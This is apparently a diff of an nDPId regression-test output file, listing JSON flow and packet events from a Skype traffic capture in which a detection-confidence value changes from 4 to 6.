+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1431969642334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1431969642334,"pkt":"0NQSxnP1PBXCt3IOCABFAABXAnAAAEAR9LLAqAEiwKgBAeU5ADUAQzJbSPEBAAABAAAAAAAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642336,"flow_last_seen":1431969642336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642336,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431969642336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642336,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5NNAAEAGc8HAqAEiQTffIcNqnEKAlL6TAAAAALAC\/\/\/spQAAAgQFtAEDAwUBAQgKPiKLPAAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431969642337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969642337,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+t\/gAAEARP0PAqAEiwKgBAcKBADUAKu5ghe0BAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1431969642337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969642337,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+EyEAAEAR5BrAqAEiwKgBAf4VADUAKsDYd8YBAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAABwAAQ=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431969642376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969642376,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+lUAQEJvL9OBgAABAAEAAAAABWU3NzY4AWIKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAQABBffSSI="} -00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.223.73.34"}} +00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.223.73.34"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642376,"flow_last_seen":1431969642376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431969642376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw0tAAEAGVKHAqAEiF99JIsNrAbvkkjeSAAAAALAC\/\/9pYAAAAgQFtAEDAwUBAQgKPiKLYwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431969642398,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969642398,"pkt":"0NQSxnP1PBXCt3IOCABFAABKxdsAAEARMVTAqAEiwKgBAcNGADUANrH\/diQBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAAAEAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1431969642398,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969642398,"pkt":"0NQSxnP1PBXCt3IOCABFAABKPqUAAEARuIrAqAEiwKgBAd\/IADUANro4UU4BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAABwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1431969642400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1431969642400,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA15TkAhAy4SPGBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAArBADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969642400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969642400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431969642433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642433,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGIPEX30kiwKgBIgG7w2sxgMP95JI3k6ASOJD6qQAAAgQFrAQCCAr301nQPiKLYwEDAwU="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431969642434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642434,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0zNJAAEAGSybAqAEiF99JIsNrAbvkkjeTMYDD\/oAQECxRlwAAAQEICj4ii5z301nQ"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969642376,"flow_last_seen":1431969642434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969642434,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skypeassets.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642444,"flow_last_seen":1431969642444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642444,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":50028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431969642444,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642444,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ldAAEAGhorAqAEinTh+08NsAbvs\/oHsAAAAALAC\/\/9bSwAAAgQFtAEDAwUBAQgKPiKLpgAAAAAEAgAA"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1431969642469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642469,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYZlBN98hwKgBIpxCw2oyvdjRgJS+lKASOJDQnQAAAgQFrAQCCApNl5tJPiKLPAEDAwk="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1431969642469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642469,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MzFAAEAGJXDAqAEiQTffIcNqnEKAlL6UMr3Y0oAQECwnRgAAAQEICj4ii75Nl5tJ"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"skype.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1431969642519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969642519,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4WGRAAHYGzoWdOH7TwKgBIgG7w2wloWLk7P6B7ZASIACkPAAAAgQFrAQCCAoZLBplPiKLpg=="} 